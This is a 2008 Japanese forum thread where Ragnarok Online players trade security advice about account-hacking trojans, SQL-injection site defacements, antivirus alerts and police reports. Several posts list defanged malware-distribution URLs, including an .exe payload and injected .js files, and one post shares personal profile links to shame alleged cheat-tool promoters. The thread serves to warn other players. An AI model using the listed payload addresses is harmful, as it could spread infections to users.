IBM SOCでは2008年3月24日19頃から、SQLインジェクションを使った攻撃の再開を確認しました。
ttp://www.isskk.co.jp/SOC_report.html

例の「fuckjp■js」による改ざん攻撃が再開されているようです。

144 名前:(○口○*)さん:08/03/27 07:12 ID:+EMo9XL70
このスレ的には、カスペルスキーが一番オススメっぽいな・・・。
バスター消そうかな。2008になってなんか使いづらいし・・・。

145 名前:(○口○*)さん:08/03/27 08:52 ID:UM1zpAaM0
>>142
読まずに削除してた\(^o^)/
だってQuickHealからの返信メール、
中身としてはほとんど意味ないんだもん。

>>143
LACにも出てたね。
2117966■net、ググるとfuckjp0.jsなんだけど
0付きのは見つからなかったなぁ(0無しの既出のはあった)。

146 名前:(○口○*)さん:08/03/27 08:57 ID:2LVOxKXk0
総合スレ547

【  アドレス   】http://www5■uploader■jp/user/tane/images/tane_uljp00326■jpg

どう見てもただのブラクラです。ここは鑑定スレじゃねーんだ、2chで鑑定スレ捜してそっちで聞け。

F-Secure 6.70.13260.0 2008.03.26 Trojan.HTML.Agent.b
Kaspersky 7.0.0.125 2008.03.27 Trojan.HTML.Agent.b
Sophos 4.27.0 2008.03.27 Mal/Iframe-F
Webwasher-Gateway 6.6.2 2008.03.26 Webwasher: Win32/ImgTagVulnerability

147 名前:(○口○*)さん:08/03/27 09:16 ID:UM1zpAaM0
そのアップローダ自体2chセキュ板のだしなぁ

148 名前:(○口○*)さん:08/03/27 13:44 ID:OIzir/Su0
質問です。
最近はスクリプトで罠が仕掛けられているというのをこのスレで見るのですが、
そのスクリプトはソースチェッカでも危険として出るのでしょうか?
それと、危険なスクリプトの見分け方(どういった文字列が含まれていると危険なのか)
等を教えてはいただけませんでしょうか?
すみませんが、宜しくお願いします。

149 名前:(○口○*)さん:08/03/27 14:14 ID:2SBCNblQ0
英文読解の能力も、セキュリティリスクと言えるかもしれないな。

150 名前:(○口○*)さん:08/03/27 16:13 ID:2LVOxKXk0
>>148
主に使われるのが、サイズ0(縦横両方、もしくは片方)のiframeによってアカハックのダウンローダを
読み込ませる方式。この方式で、既知のアドレスを呼び出していたら、最後まで辿らないでもアカハックと
断定しちゃっていいと思う。

JavaScriptでダウンローダを読み込ませるものもあるので、iframeが無ければ安全という訳ではない。

他にも、アニメカーソルを呼び出し、WindowsUpdate当たっていなければ、セキュリティの穴を利用して
本体をダウンロードさせようとするものもある。

>そのスクリプトはソースチェッカでも危険として出るのでしょうか?
ぶっちゃけると出ないこともある。iframeでの呼び出し自体は普通のWebページでもあるし、
カウンターの類を表示させずに実行させる為に挿入されるケースも無いとは言い切れない。

危険なスクリプトかどうかの断定は、結局の所、辿ってみないとわからないところもある。

151 名前:(○口○*)さん:08/03/27 16:39 ID:7xc14npp0
「注意!○○タグを発見!」と黄色で書かれてても無害な物もあるし
「このアドレスの安全度 100%」と出ていてもソース見ると紛れもない垢ハックだったり

「チェック結果」の情報を参考にしつつソースを自分で精査しないと
確実なところはわからないと思うね

152 名前:(○口○*)さん:08/03/27 18:39 ID:OIzir/Su0
なるほど、厳しいんですね…頑張って調べてみます。
ありがとうございました。

153 名前:(○口○*)さん:08/03/27 22:23 ID:Y1O/NrJp0
捜査にはガンホーの協力が不可欠で、また海外からの不正アクセスには積極的な捜査が難しいこともあり
結局のところほぼ全ての被害者が泣き寝入りになっているようである。
ガンホー側が動かない限り被害者はほぼ引退に追い込まれるのだが、
ガンホーには何の動きも見られなかったようだ。
消費者センター側もたびたび警告を行っている模様だが、受付も「またガンホーですか」という対応を見る限り蛙の面に水。

これアサテンプレからなんだけど
ここ見ると結構帰ってきてる人いるみたいだよね?
実際捜査以来して帰ってこなかった人いる?やられちゃって不安なんだけど・・

154 名前:(○口○*)さん:08/03/27 23:27 ID:S/5iZJvu0
>>153
それは情報が古いのではないかと。
アカハックが流行しだした頃は、泣き寝入りが多かったそうですよ。
ハイテク犯罪センターがアカハックの知識をつけてくれたりしたおかげで、
警察から要請があれば調査せざるを得ないことや件数の多さなどから
「不正アクセスが立証できれば補償する」
という方向に変わったのでしょう。

現在はアカハック専用の被害届けフォームまで置いているくらいですし、
消費者センターに相談などしなくてもスムーズに処理されるようなルートが出来ています。

155 名前:(○口○*)さん:08/03/27 23:36 ID:WtSN23jC0
単純に修正しようとすると癌を目の敵にしてる人が妨害するせいだと思うけどね。

156 名前:(○口○*)さん:08/03/28 00:45 ID:kXUQfrL90
修正ってなにをさ。

157 名前:(○口○*)さん:08/03/28 00:48 ID:6kO/h2iU0
アサテンプレの文章でしょ

158 名前:(○口○*)さん:08/03/28 02:27 ID:k2FgS9Qg0
最後の行の消費者センター云々はアカハックと関係無いんじゃないかねぇ
消費者センターからの警告って主にBOT蔓延に対して声が大きかった頃でしょ
アカハックに付いても消費者センター通したって報告あったっけ?

159 名前:(○口○*)さん:08/03/28 02:31 ID:k2FgS9Qg0
なんか初期の初期にあったような気がしてきた……158はスルーで

160 名前:(○口○*)さん:08/03/28 03:02 ID:RI3zaktr0
FAQ/用語集/か行→ 癌砲
ttp://assassin.rowiki.jp/index.php?FAQ%2F%CD%D1%B8%EC%BD%B8%2F%A4%AB%B9%D4#k779c63b
--
2006年末のオフラインミーティングでは「アイテム課金の後不正者対策を行う」と発言、その拝金ぶりにユーザーは激怒。
その直後課金アイテムが公式発表された。
その課金アイテムの「濃縮オリデオコン」「濃縮エルニウム」実装に合わせて、
二次職実装以来存在していたBSの武器研究による精錬成功率上昇を消滅させ事実を隠蔽。

これから先の不正者取締りが注目・・・される事はもうないかもしれない。
--
1年以上前で止まっているわけで
つうか癌の悪口書きたいだけじゃないかと
こんなところ見ない、って人も多いんだろうが、ケツぐらいは拭いて欲しいよなあ

161 名前:(○口○*)さん:08/03/28 14:27 ID:aqDuz3UQ0
>>160
アサシンwikiにとってあまり重要ではない項目なんだろう
俺には癌の項目に特に書き足すことはない
wikiなんだからそのままで自分が困るなら自分で編集すればいい

よく悪意の編集をされてるから閲覧には注意すべきではある

162 名前:(○口○*)さん:08/03/28 14:43 ID:Q0ROprGv0
mixiでautomouseの宣伝をやってたやつがいたので晒し上げ
http://mixi.jp/show_friend.pl?id=17426855
http://mixi.jp/show_friend.pl?id=17429717
http://mixi.jp/show_friend.pl?id=17447324
http://mixi.jp/show_friend.pl?id=17447177
http://mixi.jp/show_friend.pl?id=17430344

↑のやつらの元アカっぽいやつはこれ
http://mixi.jp/show_friend.pl?id=14890435

mixiが安全じゃないことはもう分かってると思うが、見かけたら気をつけてくれ

163 名前:(○口○*)さん:08/03/28 15:04 ID:+0u9vQjD0
スレ違いだ馬鹿、さっさと削除依頼出してこい

164 名前:(○口○*)さん:08/03/28 21:45 ID:qExxYqgF0
お試しカスペ入れてRO起動したら、なんか検知された。
これって、一体何なのでしょう?
放置しててもいいのか、消去したほうがいいのか
さっぱり不明です・・・。

検知しました: リスクウェア Invader

165 名前:(○口○*)さん:08/03/28 22:05 ID:YQjFa9eL0
>>164
RO(nPro)は不振な振る舞いをするリスクウェアです。

セキュスレ2より
|10 名前:(○口○*)さん:07/04/25 17:19 ID:ecNW/h2i0
|今ROを起動したところカスペルスキーが反応して

|プロセスを実行します
|\RagnarokOnline\GameGuard\GameMon.des
|リスクウェア「Invader」の亜種を検知しました

|と出ました。
|プロセスをすべて拒否し、念のため回線を抜いて携帯からパス変更しました。
|Invaderをググってもよくわからないので、これは一体何なのかどなたか教えて
|もらえないでしょうか(´・ω・`)

|携帯から書き込もうとしたらエラーが出たので、当該PCより書き込んでいます。

|11 名前:(○口○*)さん:07/04/25 17:33 ID:2a4usTN10
|nPro自体がルートキットみたいな属性なんで、悪質なソフトと誤認された可能性が高いです。
|本当にウィルスなのか、nProがウィルスと誤認されただけなのかの判断ができません。

|リスクウェアの説明を読んでみて下さい。nProがこれに該当するのは当然だと思いますが…。
http://www.viruslistjp.com/riskware/

|nProのリスクを把握したうえでプレイするわけですから、ROをプレイするなら許可出しちゃっていいと思います。
|気分が悪ければ、キャラデリ→癌ID削除→HDDフォーマット(nProの残骸抹殺)してクリーンな環境に戻りましょう。

166 名前:(○口○*)さん:08/03/28 22:15 ID:qExxYqgF0
>>165
御教授、感謝します<(__)>
なるほど・・・nProですか。
とりあえず、許可してみます。

167 名前:(○口○*)さん:08/03/29 07:28 ID:XEw5hhyV0
>>162
中華の宣伝するなよ・・・

168 名前:(○口○*)さん:08/03/29 14:44 ID:B72OdICH0
ハクスレにあったけど、念のためにこちらにも転載
重要なのでageとく

---------------------------------------------------
577 名前:(^ー^*)ノ〜さん MAIL:sage 投稿日:08/03/29 13:30 ID:wUl6oFc40
>2にある
>・リネージュ資料室 (応用可能な情報が多数)
> http://lineage.nyx.bne.jp/
が、3/29付で移転しております。
ttp://lineage.paix.jp/
に、自動で転送されますが、PeerGuardian2用リストは登録し直しが必要になるそうです。


578 名前:(^ー^*)ノ〜さん MAIL:sage 投稿日:08/03/29 14:42 ID:70aOROei0
>577
当然ながら、hostsリストもアドが変更になってる。

特にhostsRenew使ってて、更に自動更新かけてる人は必ず設定の変更を。
BSWikiさんのリストを組み込んでたり、hostsAppend=0にしてたらまだ平気だけど
デフォ設定のままだと、ごっそりと情報が欠落することになる。
---------------------------------------------------

169 名前:セキュスレ1-936:08/03/29 17:08 ID:GlTW51hG0
hostsRenewScriptの人です。

リネージュ資料室さんのアド変更に伴い、Ver0.09aに更新しました。
ttp://acopri.rowiki.jp/index.php?hostsRenewScript

変更点はstrURL(0)の設定値(URL)のみです。


>168で指摘されてるように、デフォルト設定のままですと纏め臨時サイトさんの
リストしか読み込みません。

以前のリネ資料室のアドレス変更時は旧アドでもDL出来たのですが
今回は旧アドだとDL出来ないため、必ずcfgの変更をお願いします。

170 名前:(○口○*)さん:08/03/29 18:49 ID:emyHRGrS0
お試しカスペ入れてRO起動したらキーロガー検知って出たんだけど
これも164と同じなんでしょうか?

171 名前:(○口○*)さん:08/03/29 19:11 ID:LsulVmCh0
プロアクティブディフェンスを有効にしていると、何種類か引っかかるよ
ROの起動時だけではなくログイン中にも検出される

172 名前:(○口○*)さん:08/03/29 20:46 ID:ZtzS+nz90
>>170
Ragexe.exeが検出されることもあれば、隠蔽されてて対象名がでないこともあるけど、nProの場合が多い。
他タスクを検知してる可能性もあるから断定はしないけど、うちでも出てるよ。

173 名前:(○口○*)さん:08/03/30 01:01 ID:kYAbi+tE0
というかその質問も多すぎるからテンプレ入りかもしらんね

174 名前:(○口○*)さん:08/03/30 11:58 ID:ka6ogmEx0
【      気付いた日時          】2008/03/30
【不審なアドレスのクリックの有無 】「きもろだ」でクリック
【  アドレス   】http://f40■aaa■livedoor■jp/~kimoita/up/img/1027■html
【     OS    】WindowsXP Home SP2
【使用ブラウザ 】IE6.0.2 sp2
【WindowsUpdateの有無】 2週間前
【 アンチウイルスソフト 】ウィルスバスター
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンで検出無し
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】HACKの文字があり不安になった為書き込みに至る

クリックしてしまったのですが、大丈夫でしょうか?
よろしくお願いします

175 名前:(○口○*)さん:08/03/30 12:00 ID:Qkyg3OWG0
>>174
3.スレで質問する
 1.2の方法でも判断出来ない場合、スレで聞いてみるのも手です。
 ただし、このスレは『勇気が無くて見れないサイト解説スレ』ではありません。
 その点だけは注意してください。

176 名前:(○口○*)さん:08/03/30 12:49 ID:opa3rLNZ0
確かに、下記の文字列は入ってるけど…危険そうなコード見あたらないしなぁ。
send_aaa.js 辺りは見てもわからんし、とりあえずパス1。

script language="Web Hack,Hack Team,Pc Hack,Msn Hack,Xss,security,proxy,exploits,Hacker,crack,firewall,scan,Serial,Shell,Fake,Defaced,emchack,nettoxic,programlar"

177 名前:(○口○*)さん:08/03/30 12:50 ID:SnxDpmw10
>>169
資料室は以前に、クラック依頼が出されていたような話も出ていたし、DDNSのサービス運営会社も挙動が怪しい。
ドメインが失効した場合に、スクワットされる可能性も捨て切れないので、移転前のURLは最終的にブロック対象に含めるのが
良いのかもしれない。念の為に。

ネットサービスで何が怖いって、音信不通なんだよね。

178 名前:(○口○*)さん:08/03/30 15:57 ID:LPfPxGG00
>>177

流石に特定アにjpは敷居高いと思うぞ。

179 名前:(○口○*)さん:08/03/30 17:11 ID:Cfmrq6490
>>178
特亜だからこそ何してくるか分からないわけだが…。

180 名前:(○口○*)さん:08/03/30 22:14 ID:oFHNceIg0
万が一DDNSのサービスを攻撃されると非常にやばい。
そこまでしなかったとしても、国内にいる仲介者が取得したら同じ事。

動向次第なのは確かだけど、最終的に旧アドレスは危険扱いにした方が無難、とかになるかもね。

181 名前:(○口○*)さん:08/03/31 07:18 ID:HGdbYXNl0
jpでいいならドメインとらなくても
geocitiesとかiswebとかaaacafeとかに置けばいいんじゃね?

182 名前:(○口○*)さん:08/03/31 09:27 ID:ACfyy39g0
>181
上の流れは資料室さんの旧アド(bne.jp)の話じゃね?


ところでふと思ったんだが、職Wikiの一部はrowiki.jpでやってる。
でも実体はxreaとかのレン鯖とかにある。

これと同じように中華が自前でCNなドメインを取り、中継者がjpドメインを取って
jpドメインでアクセスできるように設定されると、厄介なことにならんかね?

183 名前:(○口○*)さん:08/03/31 10:39 ID:m49Kggpc0
>>182
理論の上では可能だが、多分割りに合わないからやっていないのだと思われ。
.cn(や.com)は取得費用が安いが、.jpは明らかに高いし。
それと、.jpで取得してきたら、不正アクセスで中継者の立件も視野に入るし。

むしろ危惧すべきは、xrea.comのtypo狙いドメイン。
こちらのほうが、取得が容易な分、想定被害の面では危ないと思われ。
具体的な例は挙げないが、実在するドメインと、現段階で取得可能な物がある。

その意味では、現在行われているrowiki.jpへのCNAME集約も、一定の効果があるかと。
.jpドメインなら、typoしても大したことはない。

184 名前:(○口○*)さん:08/03/31 16:55 ID:ACfyy39g0
>183
コストとリスクの問題かぁ。
でも逆に言えば、割に合う判断してきたらjp系ドメインで活動する可能性もあるわけで。

typo含めてアドレスは要注意・鵜呑みにしてはいけないってのは変わらないけど
jpドメインだと警戒心薄れる場合もあるから気をつけないとね。

185 名前:(○口○*)さん:08/04/01 04:26 ID:/SGVEA94O
昨日の朝日の夕刊の社会面に、中国からのSQLインジェクションによるサイト改竄被害について書かれてるんだが
これって、もはやネット上の全てのサイトの安全性が保証できないってことか

186 名前:(○口○*)さん:08/04/01 08:14 ID:ua+7x1mt0
中華RMT業者がiframeやscriptでネトゲトロイを突っ込むのは
前からある話だよ。3年前には価格コムが改竄され、
先月はトレンドマイクロが改竄された。
いずれもSQLインジェクションで、きちんとアプリを作らなかったメーカがボンクラ。

187 名前:(○口○*)さん:08/04/01 08:22 ID:Q6ZaH/HI0
FC2の最近のtemplate改竄も、SQLインジェクトされた疑いが出てきているな。

229 名前:Trackback(774)[sage] 投稿日:2008/03/26(水) 05:12:16 ID:g0QkeMYd
http://blog.fc2.com/forum/viewtopic.php?p=82913#82913
一連の改竄騒ぎは新管理画面がヤバイというプログラマの意見

>テンプレートは旧管理画面はファイルに新管理画面はDBに登録されている、という記述がどこかにあったこと、
>// DB に登録したほうがメインとなるサーバの負荷は下がるが、SQLインジェクションをくらいやすくなる
>セッション管理がうまくいっていない(アドホックな対応が行われている)という印象を受けること

188 名前:(○口○*)さん:08/04/01 11:16 ID:0/BjvKsL0
無償アンチウイルス“avast! Home”にスパイウェア・ルートキット対策が追加
最新版v4.8が公開、Windows Vista SP1およびWindows XP SP3での動作を確認済み
http://www.forest.impress.co.jp/article/2008/03/31/avast48.html

189 名前:まとめ臨時 ◆kJfhJwdLoM:08/04/02 00:55 ID:Bv4OR86L0
お久しぶりです。まとめ臨時の中の人です。
http://sky.geocities.jp/ro_hp_add

過去にあった救済報告と被害例、疑問など最近の過去スレから有用かな?
と判断したものを拾い上げて事例ごとにUPしました。

190 名前:(○口○*)さん:08/04/02 18:43 ID:zmoouw0aO
中の人乙です

ついでにageとく

191 名前:(○口○*)さん:08/04/02 21:34 ID:GAyBqK/R0
Webサイトの検索機能を悪用、「IFRAME SEOポイズニング」攻撃が流行
ttp://pc.nikkeibp.co.jp/article/NEWS/20080331/297570/

Webサイトの改ざんをしないで、危険サイトに誘導する方法が流行っているらしい

192 名前:(○口○*)さん:08/04/03 08:53 ID:MmgvTKFhO
最近FFから復帰したんだがROでもFC2は踏まないでいたほうがいいのか
桑原桑原

193 名前:(○口○*)さん:08/04/03 12:23 ID:Z7LxLsGf0
つうかFFI(大航海もかな)に活動拠点を移した感じがする
ROは半年前に通った道

194 名前:(○口○*)さん:08/04/03 18:10 ID:nkGyUxWN0
Apple、11件のセキュリティ問題を修正した「QuickTime」v7.4.5を公開
ttp://www.forest.impress.co.jp/article/2008/04/03/quicktime745.html

195 名前:(○口○*)さん:08/04/04 08:47 ID:AU1n0hjA0
ここ数日PG2が58■227■193■190をブロックしているのですが垢ハックウイルスに感染しているのでしょうか?
とても心配です(´・ω・`)

196 名前:(○口○*)さん:08/04/04 09:28 ID:lkQR3HfX0
>195
そのIPは韓国のものっぽいけど、心配する前にウィルスのチェックやら
WindowsUpdateの確認やら、いろいろと済ませたのかい?

197 名前:(○口○*)さん:08/04/04 10:34 ID:Mz0AlZLx0
http://spywaredetector.net/spyware_encyclopedia/Spyware.Blue%20Mountain.htm
スパイウェアだな

198 名前:(○口○*)さん:08/04/04 11:51 ID:arMDG0GJ0
やることやってから尋ねろって事だな

199 名前:195:08/04/04 19:03 ID:AU1n0hjA0
返信送れてすいませんm(_ _)m
WUはIE7へうp以外はすべて完了してます(XP SP2)
カスペの検査も問題なかったです

どうもttp://sankei■jp■msn■com/(産経新聞のHP)にアクセスすると該当IPへのアクセスがでてブロックされるようなので特に問題ないのかなと考えてます
お手数おかけしました

200 名前:(○口○*)さん:08/04/04 22:54 ID:arMDG0GJ0
向こうの誘導キチガイ何とかしてくれ

201 名前:(○口○*)さん:08/04/04 22:58 ID:1zjRtrdV0
向こうの591は俺だが590はネタ振りにしか見えなかった
俺はトスされたボールを打ち返したにすぎない

202 名前:(○口○*)さん:08/04/04 23:02 ID:nonxIktZ0
そういう奴は嫌いじゃない

203 名前:(○口○*)さん:08/04/04 23:21 ID:arMDG0GJ0
それってネタとして使ってるって事じゃないのか、わかってるなら触るなよ

204 名前:(○口○*)さん:08/04/04 23:23 ID:1zjRtrdV0
あれ以外にどう返せと言うのだね
目の前で竜ちゃんが「押すなよ! 絶対押すなよ!」って言ってる気分だったぞ

しかも590どう見ても必要なレスじゃねーし

205 名前:(○口○*)さん:08/04/04 23:25 ID:arMDG0GJ0
おまえさんにゃ何言っても無駄のようだ

206 名前:(○口○*)さん:08/04/04 23:26 ID:1zjRtrdV0
ちなみに俺が誘導貼ったのは今回が初めてだ
それだけ絶妙なネタ振りだった

207 名前:(○口○*)さん:08/04/04 23:33 ID:AuMPRr3g0
だから、そういうネタは、あっちではやるなよ。

208 名前:(○口○*)さん:08/04/04 23:35 ID:1zjRtrdV0
そもそも590がなければ591も必要なく、その590が必要なレスではないという
ネタ抜きにしても他の対応手段はないと思うんだが

209 名前:(○口○*)さん:08/04/04 23:39 ID:nonxIktZ0
放置またはマジレス

210 名前:(○口○*)さん:08/04/05 00:11 ID:UQgjfhVe0
そろそろ、向こうが今でも必要なのかどうか、見直す時期なんじゃないかな。
1スレ自体は4年前に建てられたものだし、当時と今では、ハックの内容も、周囲の取り巻く状況も大きく変化している。
それと、RO板というか、MMOBBSにログ保存の仕事を押しつけ杉ではと思う側面もある。
RO板にある事によって、他のオンラインゲームのプレイヤーに注目されにくい部分もあるし。

また、危険アドレスを掲載する事によって、注意喚起にはなるが、一方で該当アドレスが警戒対象になった事が業者の連中に
判ってしまうので、ばら撒くアドレスを新しいものに移行することを加速させてしまう可能性もある。まるで耐性菌の問題のようだが。

そろそろ、掲示板システムに頼らない、外部での情報収集、蓄積のシステムへの移行が必要な時期なのかもしれない。
リネ資料室も、無料DDNSに限界を感じ、独自.jpドメインへの出費も止むなしとなった訳だし。

211 名前:(○口○*)さん:08/04/05 01:14 ID:7AjPsspt0
>>210に激しく期待。

212 名前:(○口○*)さん:08/04/05 18:01 ID:Co0fWt8R0
本スレの補填された人、zも補填されたのか〜。
自分も被害にあって補填された人なんだけど、zの補填はできませんって
キッパリ最初の文章で断り入れられてたよ。
どうせ2-3Mくらいしかなかったけどさ。

213 名前:(○口○*)さん:08/04/05 18:45 ID:uZiho9Re0
>>43-44です。
一昨日、警察署に出向いてきました。
担当官の作った供述調書に目を通し、おかしいところを直してサインと拇印を押してきました。
調書の内容は、「私は○月○日、このような事件にあいました」という
私目線の口調で書かれたもので、A4の紙に大きめの字で4ページくらいでした。

相方の担当官とも連絡を取ったそうですが、あちらも頭を抱えていたとか。
以前、IPから住所を割り出してあるアパートにたどり着き、
大家さんに頼んで鍵をあけたところ、人は誰もおらずサーバが部屋のど真ん中で動いていただけだったとか。
(プロキシサーバだったみたいです。海外からのアクセス用)
海外からとわかった時点でガンホーから捜査打ち切りと言われないか心配…といってました。

なんにせよ、これでやっと相手を調べにかかることができるそうです。
時間がかかっていますが、手口が常習犯くさすぎるので
担当官も慎重になられているようです。

214 名前:(○口○*)さん:08/04/06 14:14 ID:2bDG1N920
2117966と似たような(あれよりは小規模な)script注入。
ttp://blog.trendmicro.com/massive-iframe-attacks-continue/
あっちで扱うべきか微妙な(国内での注入が確認されていない)ので
とりあえずこっちに。
www■nmidahena■com
→www■nmidahena■com/test.exe

215 名前:(○口○*)さん:08/04/06 18:46 ID:1RCQWtZN0
>>214

削除依頼してこいw
ドットは■に変換!これお約束だぞ

214の内容のこぴぺ(修正済み)

2117966と似たような(あれよりは小規模な)script注入。
ttp://blog■trendmicro■com/massive-iframe-attacks-continue/
あっちで扱うべきか微妙な(国内での注入が確認されていない)ので
とりあえずこっちに。
www■nmidahena■com
→www■nmidahena■com/test.exe

216 名前:(○口○*)さん:08/04/06 18:51 ID:1RCQWtZN0
あ・・・俺が吊ってくるわ

217 名前:(○口○*)さん:08/04/06 19:06 ID:2bDG1N920
どんまい

218 名前:(○口○*)さん:08/04/06 19:43 ID:AU+sSuGn0
TrendMicroも改竄されたことがあるから、あながち間違った対応、とは言い切れないご時勢だけどね。
困ったものだ。

219 名前:(○口○*)さん:08/04/06 22:58 ID:KyxjiIez0
最近ブラウザを、昔から使ってたIEコンポーネント系タブブラウザ
(※数年前に開発終了してる)からsleipnirに切り替えたんだが
アドレスバーに単語入れるとGoogle の I'm Feeling Lucky で
検索してページ出してくれるのな……

動作が気に入らないからカスタマイズして設定変えたけど
最近のブラウザはこういう動きが多いんだろうか?
これって非常に危険な仕様に思えるんだが……

220 名前:(○口○*)さん:08/04/06 23:10 ID:Bi9wt8JQ0
Donaにはじまり、その後は長いことMoon使ってたが、Sleipnirは
何度も挑戦して馴染めず、結局わりと最近Firefoxに移行してほぼ
落ち着いたかな……

221 名前:(○口○*)さん:08/04/06 23:42 ID:bedv7u110
アドレスバーに単語を入れると検索するって仕様は、いまでは大抵そうだな

222 名前:(○口○*)さん:08/04/07 05:24 ID:6cbclfTD0
>>221
単語入れると検索、だけじゃなく
検索した結果のページのどれかを勝手に表示する(I'm Feeling Lucky)
のが危険、って話じゃないの?

223 名前:(○口○*)さん:08/04/07 11:46 ID:AIF3SVu20
>>222
>>219の内容はそういうことだよな。
火狐もI'm Feeling Lucky使ってるから気をつけたほうがいいかもしれん。
だが検索結果1位のページ表示だから検索対象が変なサイトじゃない限りは“おそらく”大丈夫だろう。

224 名前:(○口○*)さん:08/04/07 13:42 ID:litc0lZe0
警察に調査依頼して3週間音沙汰無しなんだけどなんていって催促したらいいかな・・

225 名前:(○口○*)さん:08/04/07 13:44 ID:rmMgnaFV0
何に対してもだけどこちらから積極的に動かないと進展無いぞ?
遠慮する必要なんて無いし

226 名前:(○口○*)さん:08/04/07 13:52 ID:q2XcKYCZ0
「あの〜アカウントハックの件で○○さんを…」
「異動になりました」

227 名前:(○口○*)さん:08/04/07 15:34 ID:dSDzUl2e0
>223
意図しないページが表示されるという点で気持ち悪い仕様だけど、元々これはGoogleの機能だし
結局の所、Googleを信用するしかないのかもねぇ。

対策としては Sleipnir に標準でついてる検索バーから検索する。
(検索バーは結果が出るので即飛ぶことは無い)

又アドレスバーに単語入れて検索する癖がある場合は 
ツール→オプション→ツールバー→アドレスバー
から検索リクエストをカスタム設定にして設定変更して、I'm Feeling Lucky を
使わないようにする。

それか上の設定から「検索を無効にする」でもいい。


ちなみに自分はアドレスバーの検索が癖になってるので、カスタム設定で以下のような形にして
普通の検索結果が100件出るようにしてる。
http://www.google.co.jp/search?num=100&hl=ja&q=@enc:

228 名前:(○口○*)さん:08/04/07 17:26 ID:Zet1eURK0
プニル使いだがアドレスバーも検索バーも表示しない設定にしてるよ。
アドレスはコピーしてCTRL+SHIFT+Vで新規に開けるし、
検索はお気に入りからグーグル開いて入力してる。

229 名前:(○口○*)さん:08/04/07 17:57 ID:xDMP1tNV0
鯖板にあったもの。アカハックではなく、多分spamなのでこっちに。

|674 Saraの中の名無しさん New! 08/04/07 17:04:46 ID:EgX5XSqq
|今後こちらの掲示板を使用します。
|引き続きトリップなどの練習は練習用で!
|ttp://www■info-kirara■net/cgi-bin/bnbbs/bnrbbs■cgi

230 名前:(○口○*)さん:08/04/07 20:55 ID:W8D0cCWW0
>>224
最寄署にしか相談していませんか?
最寄署に再度連絡し、反応が鈍いようだったら警視庁のハイテク犯罪センターにも連絡してはどうでしょう。
捜査が全く進まない旨を伝えて、事情を話せば本庁からせっついてくれたりもします。

231 名前:(○口○*)さん:08/04/07 23:33 ID:litc0lZe0
>>225
そうはいっても自分の不注意で仕事増やしちゃってなんか申し訳なくてさ・・

>>256
そしたらあとは頼む

>>240
!!!
ありがとうございます(´;ω;`)
最寄にだけなんですよ。進展0のようだったら相談してみます

232 名前:(○口○*)さん:08/04/08 00:26 ID:/K2eAViD0
とりあえず落ち着け
レス番が飛びすぎだ

233 名前:(○口○*)さん:08/04/08 01:48 ID:Rp1f9Qg50
>>256>>240に期待

234 名前:(○口○*)さん:08/04/08 02:41 ID:xMmuBuPf0
早め早めに動かないと、後回しにされて最終的に忘れられるってこともあるしな

235 名前:(○口○*)さん:08/04/08 07:43 ID:J3t/v77J0
自動車サイト「carview.co.jp」、改竄によりウイルスを仕込まれる
http://internet.watch.impress.co.jp/cda/news/2008/04/07/19123.html

対象は、下記のようだが、既にサイトが存在しない模様。
ソースチェッカーオンラインのキャッシュから拾い出せたのはindex.htmまで。
それから呼びだされる先のファイルは入手に失敗。

ttp://www■414151■com/fjp■js
ttp://www■414151■com/index■htm
ttp://www■414151■com/Real■htm
ttp://www■414151■com/Bfyy■htm
ttp://www■414151■com/Lz■htm
ttp://www■414151■com/XunLei■htm

236 名前:(○口○*)さん:08/04/08 18:07 ID:HdAEzERK0
緊急(5) 重要(3)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-apr.mspx

237 名前:(○口○*)さん:08/04/09 17:29 ID:CU4mCxWO0
【      気付いた日時          】4/9
【不審なアドレスのクリックの有無 】 RO全職業各型テンプレ Wiki* のモンクの欄に
Last-modified: 2008-02-03 (日) 12:45:55  これを見た人は、七日以内に死にます。とあったので
【  アドレス   】ttp://wikiwikiあjp/roalljob/?%A5%E2%A5%F3%A5%AFあ
【     OS    】WindowsXP Home
【使用ブラウザ 】IE6.0
【WindowsUpdateの有無】 一か月ほど前
【 アンチウイルスソフト 】 NortonInternetSecurity2007
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】 特になし
【テンプレの参考サイトを読んだか】 BSWIKIはざっと読みました
【hosts変更】無
【PeerGuardian2導入】無
【説明】
あからさまに怪しかったので、「BS安全のために」でアドレスやプロパティ情報を検索にかけてみるも該当なし。
大丈夫かな、と思ったけれど、数日後(昨日)ROを起動しようとすると
エラー:このページでエラーが発生しました
ライン:2
文字:17964
エラー:documは宣言されていません
コード:0
ttp://wwwあragnarokonlineあjp/launch/
このスクリプトを実行し続けますか? はい・いいえ
と出たので不安になりました。これはモンクは関係なく、ROで通常の?トラブルが出ただけなんでしょうか?
一昨日起動したときはなにも出ませんでした。アカハックなんでしょうか?
普通に起動していいのかどうなのかご教示ください。物凄い質問スレではJavascriptがなんとかって
言われましたけど。

238 名前:(○口○*)さん:08/04/09 17:32 ID:QA6ilHPl0
そこまでちゃんとしておいてなんで置換が「あ」なのか…
URLに関してはわからないけどパッチ告知のエラーは癌のミス

239 名前:(○口○*)さん:08/04/09 18:52 ID:oL5FDXbHO
>>237
俺もそれと同じエラー出たけど、クッキーと一時ファイル消去したら出なくなったぜ

240 名前:(○口○*)さん:08/04/09 18:53 ID:QMYIlgPh0
別にクッキーは消さないで良い

241 名前:(○口○*)さん:08/04/09 18:57 ID:pp3rLKic0
スクリプトエラーは18:48付で修正されたな

242 名前:(○口○*)さん:08/04/09 18:58 ID:oL5FDXbHO
ttp://www.ragnarokonline.jp/launch/は公式だぜ

243 名前:(○口○*)さん:08/04/09 19:19 ID:KbHB3Vqx0
>公式だぜ

セキュリティソフトを売ってる会社のページが改ざんされる時代ですから。

244 名前:(○口○*)さん:08/04/09 19:21 ID:QA6ilHPl0
パッチ告知がハックされてウイルス仕込まれたら大惨事だよな

245 名前:(○口○*)さん:08/04/09 19:26 ID:CU4mCxWO0
アカハックとかじゃなかったんですね!よかった〜安心できました。
お答えありがとうございました。>>238置換はなんでもいいのかと思って、「あ」に
してしまいました。次からは■にします。すみません。

246 名前:(○口○*)さん:08/04/09 23:34 ID:oL5FDXbHO
次がないことを祈る!

247 名前:(○口○*)さん:08/04/10 18:08 ID:dSRAppSs0
カスペオンラインスキャンのフォントがなんかへんなんだが・・・

248 名前:(○口○*)さん:08/04/11 23:04 ID:Iqt+IXbn0
ちょっと相談。下記のURL行ったらPG2が弾いてて
